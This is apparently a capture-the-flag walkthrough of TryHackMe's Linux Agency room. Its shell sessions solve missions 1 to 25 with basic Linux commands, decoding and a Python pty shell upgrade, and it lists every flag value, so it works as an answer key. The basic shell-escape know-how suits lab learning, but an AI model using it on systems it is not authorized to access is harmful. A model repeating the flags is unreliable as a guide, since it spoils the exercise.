In this walkthrough, we will go through the Linux Agency room from TryHackMe. This room will help you sharpen your Linux skills and learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers, as it's gonna be a tough ride. On that note, let's get started.

Machine Info:

| Field | Details |
|---|---|
| Title | Linuxagency 1.5 |
| IP address | 10.10.86.7 |
| Difficulty | Medium |
| Objective | This room will help you to sharpen your Linux skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers, as it's gonna be a tough ride. |

Task 1 – Deploy The Machine

Task 2 – Let’s just jump in

Task 3 – Linux Fundamentals
Question 1 – What is the mission1 flag?
- The first flag is already presented on the banner screen of your SSH login.
wh1terose@fsociety:~$ ssh [email protected]
The authenticity of host '10.10.86.7 (10.10.86.7)' can't be established.
ECDSA key fingerprint is SHA256:NPQ78ILJE6Ra+F9r/z2ZUWdpPGeAHnuNAc5kOaFbTjU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.86.7' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
mission1{174dc8f191bcbb161fe25f8a5b58d1f0}
agent47@linuxagency:~$

mission1{174dc8f191bcbb161fe25f8a5b58d1f0}

Question 2 – What is the mission2 flag?
- To move ahead, use the mission 1 flag string as the password for the user mission1. Listing that user's home directory reveals the mission 2 flag. Use it in the same way to log in as mission2.
agent47@linuxagency:/home$ su mission1
Password:
mission1@linuxagency:/home$ ls
0z09e diana maya mission11 mission14 mission17 mission2 mission22 mission25 mission28 mission30 mission6 mission9 sean xyan1d3
agent47 jordan mission1 mission12 mission15 mission18 mission20 mission23 mission26 mission29 mission4 mission7 penelope silvio
dalia ken mission10 mission13 mission16 mission19 mission21 mission24 mission27 mission3 mission5 mission8 reza viktor
mission1@linuxagency:/home$ cd mission1
mission1@linuxagency:~$ ls
mission2{8a1b68bb11e4a35245061656b5b9fa0d}
mission1@linuxagency:~$
mission1@linuxagency:~$ su mission2
Password:
mission2@linuxagency:/home/mission1$
mission2@linuxagency:/home/mission1$ 

mission2{8a1b68bb11e4a35245061656b5b9fa0d}

Question 3 – What is the mission3 flag?
- Now, read the contents of flag.txt using “cat” to reveal the mission 3 password.
mission2@linuxagency:/home$ cd mission2
mission2@linuxagency:~$ ls -l
total 4
-r-------- 1 mission2 mission2 43 Jan 12 2021 flag.txt
mission2@linuxagency:~$ cat flag.txt
mission3{ab1e1ae5cba688340825103f70b0f976}
mission2@linuxagency:~$ 
mission3{ab1e1ae5cba688340825103f70b0f976}

Question 4 – What is the mission4 flag?
- Using the mission 3 credentials found earlier, I switched user to mission3. Reading flag.txt with “cat” only shows a message saying that the flag has been stolen. But if we open the file with a text editor like “nano”, it gives us our flag.
mission2@linuxagency:~$ su mission3
Password:
mission3@linuxagency:/home/mission2$ cd ..
mission3@linuxagency:/home$ cd mission3
mission3@linuxagency:~$ cat flag.txt
I am really sorry man the flag is stolen by some thief's.
mission3@linuxagency:~$


mission4{264a7eeb920f80b3ee9665fafb7ff92d}

Question 5 – What is the mission5 flag?
- Further, for mission 5, read the contents of flag.txt in the flag directory inside the home folder.
mission3@linuxagency:/home$ su mission4
Password:
mission4@linuxagency:/home$ cd mission4
mission4@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission4 mission4 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission4 mission4 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission4 mission4 3771 Jan 12 2021 .bashrc
drwxr-xr-x 2 mission4 mission4 4096 Jan 12 2021 flag
-rw-r--r-- 1 mission4 mission4 807 Jan 12 2021 .profile
mission4@linuxagency:~$ cd flag/
mission4@linuxagency:~/flag$ ls -la
total 12
drwxr-xr-x 2 mission4 mission4 4096 Jan 12 2021 .
drwxr-x--- 3 mission4 mission4 4096 Jan 12 2021 ..
-r-------- 1 mission4 mission4 43 Jan 12 2021 flag.txt
mission4@linuxagency:~/flag$ cat flag.txt
mission5{bc67906710c3a376bcc7bd25978f62c0}
mission4@linuxagency:~/flag$ 
mission5{bc67906710c3a376bcc7bd25978f62c0}

Question 6 – What is the mission6 flag?
- For mission6 flag, read the hidden file – .flag.txt.
mission4@linuxagency:/home$ su mission5
Password:
mission5@linuxagency:/home$ cd mission5
mission5@linuxagency:~$ ls -l
total 0
mission5@linuxagency:~$ pwd
/home/mission5
mission5@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission5 mission5 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission5 mission5 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission5 mission5 3771 Jan 12 2021 .bashrc
-r-------- 1 mission5 mission5 43 Jan 12 2021 .flag.txt
-rw-r--r-- 1 mission5 mission5 807 Jan 12 2021 .profile
mission5@linuxagency:~$ cat .flag.txt
mission6{1fa67e1adc244b5c6ea711f0c9675fde}
mission5@linuxagency:~$ 
mission6{1fa67e1adc244b5c6ea711f0c9675fde}

Question 7 – What is the mission7 flag?
- The flag for mission7 was stored in the flag.txt file inside a hidden .flag directory.
mission5@linuxagency:/home$ su mission6
Password:
mission6@linuxagency:/home$ cd mission6
mission6@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission6 mission6 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission6 mission6 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission6 mission6 3771 Jan 12 2021 .bashrc
drwxr-xr-x 2 mission6 mission6 4096 Jan 12 2021 .flag
-rw-r--r-- 1 mission6 mission6 807 Jan 12 2021 .profile
mission6@linuxagency:~$ cd .flag/
mission6@linuxagency:~/.flag$ ls -l
total 4
-r-------- 1 mission6 mission6 43 Jan 12 2021 flag.txt
mission6@linuxagency:~/.flag$ cat flag.txt a
mission7{53fd6b2bad6e85519c7403267225def5}
cat: a: No such file or directory
mission6@linuxagency:~/.flag$ cat flag.txt
mission7{53fd6b2bad6e85519c7403267225def5}
mission6@linuxagency:~/.flag$ 
mission7{53fd6b2bad6e85519c7403267225def5}

Question 8 – What is the mission8 flag?
mission6@linuxagency:/home$ su mission7
Password:
bash: /home/mission6/.bashrc: Permission denied
mission7@linuxagency:/home$ cd mission7
mission7@linuxagency:/home/mission7$ ls -la
total 20
drwxr-x--- 2 mission7 mission7 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission7 mission7 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission7 mission7 3771 Jan 12 2021 .bashrc
-r-------- 1 mission7 mission7 43 Jan 12 2021 flag.txt
-rw-r--r-- 1 mission7 mission7 807 Jan 12 2021 .profile
mission7@linuxagency:/home/mission7$ cat flag.txt
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}
mission7@linuxagency:/home/mission7$ 
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}

Question 9 – What is the mission9 flag?
- This user has nothing in its home directory. To find the flag, go to the root directory (/); there we found the flag for mission 9.
mission7@linuxagency:/home$ su mission8
Password:
mission8@linuxagency:/home$ cd mission8
mission8@linuxagency:~$ ls -l
total 0
mission8@linuxagency:~$ cd ../..
mission8@linuxagency:/$ ls
bin cdrom etc home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot dev flag.txt initrd.img lib lost+found mnt proc run snap swapfile tmp var
mission8@linuxagency:/$ cat flag.txt
mission9{ba1069363d182e1c114bef7521c898f5}
mission8@linuxagency:/$ 
mission9{ba1069363d182e1c114bef7521c898f5}

Question 10 – What is the mission10 flag?
- Moving on to mission 10, here we have rockyou.txt. We use the grep command to filter for occurrences of the flag, and the flag is revealed.
mission8@linuxagency:/home$ su mission9
Password:
mission9@linuxagency:/home$ cd mission9
mission9@linuxagency:~$ ls -la
total 136664
drwxr-x--- 2 mission9 mission9 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission9 mission9 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission9 mission9 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission9 mission9 807 Jan 12 2021 .profile
-r-------- 1 mission9 mission9 139921551 Jan 12 2021 rockyou.txt
mission9@linuxagency:~$ cat rockyou.txt | grep "mission10"
mission101
mission10
mission10{0c9d1c7c5683a1a29b05bb67856524b6}
mission1098
mission108
mission9@linuxagency:~$ 

mission10{0c9d1c7c5683a1a29b05bb67856524b6}

Question 11 – What is the mission11 flag?
- As we can see, there is a directory called “folder” inside the mission10 home folder. It contains a tree of sub-directories. We use the grep command with the recursive option to get the mission 11 flag.
mission9@linuxagency:/home$ su mission10
Password:
mission10@linuxagency:/home$ cd mission10
mission10@linuxagency:~$ ls -l
total 4
drwxr-xr-x 12 mission10 mission10 4096 Jan 12 2021 folder
mission10@linuxagency:~$ cd folder/
mission10@linuxagency:~/folder$ ls
L4D1 L4D10 L4D2 L4D3 L4D4 L4D5 L4D6 L4D7 L4D8 L4D9
mission10@linuxagency:~/folder$ grep -r "mission11"
L4D8/L3D7/L2D2/L1D10/flag.txt:mission11{db074d9b68f06246944b991d433180c0}
mission10@linuxagency:~/folder$ 
mission11{db074d9b68f06246944b991d433180c0}

Question 12 – What is the mission12 flag?
- As per the question hint, we have to look into the environment variables. Running the “env” command reveals the mission 12 flag.
mission10@linuxagency:/home$ su mission11
Password:
mission11@linuxagency:/home$ cd mission11
mission11@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission11 mission11 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission11 mission11 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission11 mission11 3963 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission11 mission11 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission11 mission11 807 Jan 12 2021 .profile
mission11@linuxagency:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.18.11.103 58186 10.10.86.7 22
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home
XDG_SESSION_ID=17
USER=mission11
PWD=/home/mission11
HOME=/home/mission11
SSH_CLIENT=10.18.11.103 58186 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mission11
FLAG=mission12{f449a1d33d6edc327354635967f9a720}
SHELL=/bin/bash
TERM=xterm-256color
flag=mission12{f449a1d33d6edc327354635967f9a720}
SHLVL=12
LOGNAME=mission11
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env
mission11@linuxagency:~$


mission12{f449a1d33d6edc327354635967f9a720}

Question 13 – What is the mission13 flag?
- While reading the flag.txt file, we hit a permission denied error. On checking the permissions, we found that no permissions were set on the file. Adding read permission and then reading the file gives us our flag.
mission11@linuxagency:/home$ su mission12
Password:
mission12@linuxagency:/home$ cd mission12
mission12@linuxagency:~$ ls
flag.txt
mission12@linuxagency:~$ cat flag.txt
cat: flag.txt: Permission denied
mission12@linuxagency:~$ ls -l
total 4
---------- 1 mission12 mission12 44 Jan 12 2021 flag.txt
mission12@linuxagency:~$ chmod +r flag.txt
mission12@linuxagency:~$ ls -l
total 4
-r--r--r-- 1 mission12 mission12 44 Jan 12 2021 flag.txt
mission12@linuxagency:~$ cat flag.txt
mission13{076124e360406b4c98ecefddd13ddb1f}
mission12@linuxagency:~$ 
mission13{076124e360406b4c98ecefddd13ddb1f}

Question 14 – What is the mission14 flag?
- For this question, we have to decode a Base64 string to plain text to reveal the flag for mission 14.
mission12@linuxagency:/home$ su mission13
Password:
mission13@linuxagency:/home$ cd mission13
mission13@linuxagency:~$ ls -la
total 28
drwxr-x--- 3 mission13 mission13 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission13 mission13 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission13 mission13 3771 Jan 12 2021 .bashrc
-r-------- 1 mission13 mission13 61 Jan 12 2021 flag.txt
drwxr-xr-x 3 mission13 mission13 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission13 mission13 807 Jan 12 2021 .profile
-rw------- 1 mission13 mission13 978 Jan 12 2021 .viminfo
mission13@linuxagency:~$ cat flag.txt
bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=
mission13@linuxagency:~$ echo -n "bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=" | base64 --decode
mission14{d598de95639514b9941507617b9e54d2}
mission13@linuxagency:~$ 
mission14{d598de95639514b9941507617b9e54d2}

Question 15 – What is the mission15 flag?
- Next, for this one, we took the binary data found in the flag file and decoded it with CyberChef.
mission13@linuxagency:/home$ su mission14
Password:
mission14@linuxagency:/home$ cd mission14
mission14@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission14 mission14 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission14 mission14 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission14 mission14 3771 Jan 12 2021 .bashrc
-r-------- 1 mission14 mission14 345 Jan 12 2021 flag.txt
-rw-r--r-- 1 mission14 mission14 807 Jan 12 2021 .profile
mission14@linuxagency:~$ cat flag.txt
01101101011010010111001101110011011010010110111101101110001100010011010101111011011001100110001100110100001110010011000100110101011001000011100000110001001110000110001001100110011000010110010101100110011001100011000000110001001100010011100000110101011000110011001100110101001101000011011101100110001100100011010100110101001110010011011001111101
mission14@linuxagency:~$


mission15{fc4915d818bfaeff01185c3547f25596}

Question 16 – What is the mission16 flag?
- We looked into the mission15 folder and found a flag.txt file. Reading it, we found an encoded string. We then decoded the string from hex to ASCII using CyberChef.
mission14@linuxagency:/home/agent47$ su mission15
Password:
mission15@linuxagency:/home/agent47$ cd ..
mission15@linuxagency:/home$ cd mission15
mission15@linuxagency:~$ ls
flag.txt
mission15@linuxagency:~$ cat flag.txt
6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D
mission15@linuxagency:~$
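
The Base64, binary and hex decodings from missions 14 to 16 can also be done offline instead of in CyberChef. The Python below is an added example, not part of the original walkthrough; the function names and the flag regex are assumptions, and it goes slightly beyond the page by also trying plain string reversal and chained encodings.

```python
import base64
import binascii
import re
from collections import deque

# Flag shape used throughout this room: missionN{32 lowercase hex characters}
FLAG_RE = re.compile(r"mission\d+\{[0-9a-f]{32}\}")


def from_binary(text):
    """Bit string (whitespace ignored) -> bytes, or None if not 8-bit aligned."""
    bits = "".join(text.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        return None
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def from_hex(text):
    digits = "".join(text.split())
    try:
        return bytes.fromhex(digits) if digits else None
    except ValueError:  # odd length or a non-hex character
        return None


def from_base64(text):
    packed = "".join(text.split())
    try:
        return base64.b64decode(packed, validate=True) if packed else None
    except (binascii.Error, ValueError):  # bad alphabet or padding
        return None


def from_reversed(text):
    stripped = text.strip()
    return stripped[::-1].encode() if stripped else None


# Narrowest alphabet first: a binary string is also valid hex, and hex digits
# are also valid Base64 characters, so the order decides which reading wins.
DECODERS = [("binary", from_binary), ("hex", from_hex),
            ("base64", from_base64), ("reversed", from_reversed)]


def decode_flag(text, max_depth=3):
    """Breadth-first search over decoder chains; returns (chain, flag) or None."""
    queue, seen = deque([(text, [])]), {text}
    while queue:
        current, chain = queue.popleft()
        match = FLAG_RE.search(current)
        if match:
            return chain, match.group(0)
        if len(chain) == max_depth:
            continue
        for name, decoder in DECODERS:
            raw = decoder(current)
            if raw is None:
                continue
            try:
                decoded = raw.decode("ascii")
            except UnicodeDecodeError:  # wrong guess: output is not text
                continue
            if decoded not in seen:
                seen.add(decoded)
                queue.append((decoded, chain + [name]))
    return None


# Inputs taken from the flag.txt contents shown on this page. The binary one
# has spaces added between bytes and the hex one is split for line length.
BASE64_SAMPLE = "bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo="
BINARY_SAMPLE = """
01101101 01101001 01110011 01110011 01101001 01101111 01101110 00110001
00110101 01111011 01100110 01100011 00110100 00111001 00110001 00110101
01100100 00111000 00110001 00111000 01100010 01100110 01100001 01100101
01100110 01100110 00110000 00110001 00110001 00111000 00110101 01100011
00110011 00110101 00110100 00110111 01100110 00110010 00110101 00110101
00111001 00110110 01111101
"""
HEX_SAMPLE = ("6D697373696F6E31367B" "3838343431376434" "3030333363346332"
              "3039316234346437" "6332366139303865" "7D")

if __name__ == "__main__":
    for sample in (BASE64_SAMPLE, BINARY_SAMPLE, HEX_SAMPLE):
        print(decode_flag(sample))
```

Accepting a decoding only when the result matches the flag pattern is what keeps an ambiguous input, such as a bit string that is also valid hex, from being misread.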


mission16{884417d40033c4c2091b44d7c26a908e}

Question 17 – What is the mission17 flag?
- For this question, we logged in as mission16 and found a file in its home folder. The file is a binary, but no execute permission has been set on it. We set it with chmod +x and executed the file to reveal the flag.
mission15@linuxagency:~$ su mission16
Password:
mission16@linuxagency:/home/mission15$ cd ..
mission16@linuxagency:/home$ cd mission16
mission16@linuxagency:~$ ls -l
total 12
-r-------- 1 mission16 mission16 8440 Jan 12 2021 flag
mission16@linuxagency:~$ chmod +x flag
mission16@linuxagency:~$ ls -l
total 12
-r-x--x--x 1 mission16 mission16 8440 Jan 12 2021 flag
mission16@linuxagency:~$ ./flag
mission17{49f8d1348a1053e221dfe7ff99f5cbf4}
mission16@linuxagency:~$

mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

Question 18 – What is the mission18 flag?
- This question deals with Java. First compile the flag.java file with javac and then execute it to reveal the flag.
mission16@linuxagency:~$ su mission17
Password:
mission17@linuxagency:/home/mission16$ cd ..
mission17@linuxagency:/home$ cd mission17
mission17@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission17 mission17 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission17 mission17 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission17 mission17 3771 Jan 12 2021 .bashrc
-rwxr-xr-x 1 mission17 mission17 475 Jan 12 2021 flag.java
-rw-r--r-- 1 mission17 mission17 807 Jan 12 2021 .profile
mission17@linuxagency:~$ javac flag.java
mission17@linuxagency:~$ ls -l
total 8
-rw-rw-r-- 1 mission17 mission17 1199 Jun 20 07:58 flag.class
-rwxr-xr-x 1 mission17 mission17 475 Jan 12 2021 flag.java
mission17@linuxagency:~$ java flag
mission18{f09760649986b489cda320ab5f7917e8}
mission17@linuxagency:~$ 

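mission18{f09760649986b489cda320ab5f7917e8}

Question 19 – What is the mission19 flag?
- Now we have to deal with a Ruby script. As we can see, the script does not have executable permission. First we set it, and then we run the script with the ruby command to get the flag. (Because the script is passed to the ruby interpreter as an argument, read permission alone is sufficient here; the execute bit only matters when running ./flag.rb directly.)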
mission17@linuxagency:~$ su mission18
Password:
mission18@linuxagency:/home/mission17$ cd ..
mission18@linuxagency:/home$ cd mission18
mission18@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission18 mission18 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission18 mission18 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission18 mission18 3771 Jan 12 2021 .bashrc
-r-------- 1 mission18 mission18 312 Jan 12 2021 flag.rb
-rw-r--r-- 1 mission18 mission18 807 Jan 12 2021 .profile
mission18@linuxagency:~$ chmod +x flag.rb
mission18@linuxagency:~$ ruby flag.rb
mission19{a0bf41f56b3ac622d808f7a4385254b7}
mission18@linuxagency:~$ 
mission19{a0bf41f56b3ac622d808f7a4385254b7}

Question 20 – What is the mission20 flag?
- Now we have come to C files. First we will compile it using gcc and then execute the compiled binary to get the flag.
mission18@linuxagency:~$ su mission19
Password:
mission19@linuxagency:/home/mission18$ cd ..
mission19@linuxagency:/home$ cd mission19
mission19@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission19 mission19 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission19 mission19 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission19 mission19 3771 Jan 12 2021 .bashrc
-r-------- 1 mission19 mission19 276 Jan 12 2021 flag.c
-rw-r--r-- 1 mission19 mission19 807 Jan 12 2021 .profile
mission19@linuxagency:~$ chmod +x flag.c
mission19@linuxagency:~$ gcc flag.c -o flag
flag.c: In function ‘main’:
flag.c:5:18: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
int length = strlen(flag);
^~~~~~
flag.c:5:18: warning: incompatible implicit declaration of built-in function ‘strlen’
flag.c:5:18: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
mission19@linuxagency:~$ ls -l
total 16
-rwxrwxr-x 1 mission19 mission19 8432 Jun 20 08:06 flag
-r-x--x--x 1 mission19 mission19 276 Jan 12 2021 flag.c
mission19@linuxagency:~$ ./flag
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}
mission19@linuxagency:~$

mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

Question 21 – What is the mission21 flag?
- Now it's time for our good old snake friend – Python. Execute the file with the python command to get the flag.
mission19@linuxagency:~$ su mission20
Password:
mission20@linuxagency:/home/mission19$ cd ..
mission20@linuxagency:/home$ cd mission20
mission20@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission20 mission20 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission20 mission20 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission20 mission20 3771 Jan 12 2021 .bashrc
-r-------- 1 mission20 mission20 186 Jan 12 2021 flag.py
-rw-r--r-- 1 mission20 mission20 807 Jan 12 2021 .profile
mission20@linuxagency:~$ chmod +x flag.py
mission20@linuxagency:~$ python flag.py
mission21{7de756aabc528b446f6eb38419318f0c}
mission20@linuxagency:~$ 
mission21{7de756aabc528b446f6eb38419318f0c}

Question 22 – What is the mission22 flag?
- For this task, there is no flag file; instead, we have to upgrade and stabilize the existing shell into a proper TTY. I used Python to do so. Once the pty command was executed, the flag appeared on the screen.
mission20@linuxagency:~$ su mission21
Password:
$ pwd
/home/mission20
$ cd mission21
sh: 2: cd: can't cd to mission21
$ cd ..
$ cd mission21
$ ls -la
total 20
drwxr-x--- 3 mission21 mission21 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission21 mission21 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission21 mission21 3853 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission21 mission21 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission21 mission21 807 Jan 12 2021 .profile
$ python -c 'import pty;pty.spawn("/bin/bash")'
mission22{24caa74eb0889ed6a2e6984b42d49aaf}
mission21@linuxagency:~$ 
mission22{24caa74eb0889ed6a2e6984b42d49aaf}

Question 23 – What is the mission23 flag?
- In this task, we are dropped into a Python interactive session as soon as we log in as mission22. To break out of the interpreter, use the same Python pty technique to spawn a bash shell.
mission21@linuxagency:~$ su mission22
Password:
Python 3.6.9 (default, Oct 8 2020, 12:12:24)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty; pty.spawn("/bin/bash")
mission22@linuxagency:/home/mission21$ cd ..
mission22@linuxagency:/home$ cd mission22
mission22@linuxagency:~$ ls -la
total 24
drwxr-x--- 2 mission22 mission22 4096 Jun 20 08:20 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission22 mission22 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission22 mission22 3771 Jan 12 2021 .bashrc
-r-------- 1 mission22 mission22 44 Jan 12 2021 flag.txt
-rw-r--r-- 1 mission22 mission22 807 Jan 12 2021 .profile
-rw------- 1 mission22 mission22 409 Jun 20 08:20 .python_history
mission22@linuxagency:~$ cat flag.txt
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}
mission22@linuxagency:~$ 
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}

Question 24 – What is the mission24 flag?
- For this task, we got a hint in the home folder of mission23. After checking the hint, we looked into the /etc/hosts file and found an entry for a domain called mission24.com. We requested the domain with curl and found the flag in the page title.
mission22@linuxagency:~$ su mission23
Password:
mission23@linuxagency:/home/mission22$ cd ..
mission23@linuxagency:/home$ cd mission23
mission23@linuxagency:~$ ls -la
total 24
drwxr-x--- 3 mission23 mission23 4096 Jan 15 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission23 mission23 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission23 mission23 3771 Jan 12 2021 .bashrc
drwxrwxr-x 3 mission23 mission23 4096 Jan 12 2021 .local
-r-------- 1 mission23 mission23 69 Jan 15 2021 message.txt
-rw-r--r-- 1 mission23 mission23 807 Jan 12 2021 .profile
mission23@linuxagency:~$ cat message.txt
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs.
mission23@linuxagency:~$ cat /etc/hosts
127.0.0.1 localhost linuxagency mission24.com
127.0.1.1 ubuntu linuxagency
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback linuxagency
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
mission23@linuxagency:~$ curl mission24.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>mission24{dbaeb06591a7fd6230407df3a947b89c}</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
--- snipped ----


mission24{dbaeb06591a7fd6230407df3a947b89c}

Question 25 – What is the mission25 flag?
- In this one, we found a binary file named bribe. According to the message in the file, we have to bribe someone in order to reveal the flag. I set the environment variable pocket=money in order to get the flag.
